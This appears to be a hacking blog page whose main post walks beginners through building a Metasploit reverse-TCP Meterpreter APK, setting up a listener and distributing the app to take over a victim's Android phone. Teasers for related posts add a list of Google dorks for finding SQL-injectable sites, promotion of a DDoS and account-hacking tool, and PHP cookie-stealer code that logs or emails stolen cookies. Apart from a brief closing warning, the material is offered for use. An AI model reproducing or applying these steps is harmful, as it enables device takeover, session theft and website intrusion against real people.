Skip to main content

Hack Any Android Phone

Hack Any Android Phone Using Metasploit


Here is the requirement for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443

Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)

Step For Hacking Android using Metasploit: 

1. Open terminal (CTRL + ALT + T).
2. We will utilize Metasploit payload framework to create exploit for this tutorial. 



msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command



3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.


Info:

useexploit/multi/handler–> we will use Metasploit handler

set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in
step 3.


Info:

set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).

6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:



7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.

Conclusion:

1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code.
Labels:

Comments

Post a Comment

Popular posts from this blog

Php And Google Dorks 2017

A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=...
2 comments
Read more

Download Hacking tool and library for rookie

Hello guy's, In today's post i will be sharing with guy's some useful Black-hat Hacking tool which is very very useful for beginners in hacking, Have been using this tool for the past few month, its a nice tool .This Tool can be used to password cracker, DDOS tool, email scraper, web spider, website hacking.This wonderful tool was develop by  hackerlord. Description Black-hat hacking tool to easily hack website, scrape email, port scanner, crack FTP password, launch DDOS attack, mysql injection, easily hijack website, web spider, website vulnerability scanner and social engineering tool. Features hacking tool email scraper facebook account hacking tool social engineering FTP password cracker web spider tool DDOS tool port scanner vulnerability scanner gmail account hacking tool easily shut a website down easily read and write data into a website database Download
Post a Comment
Read more

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...
21 comments
Read more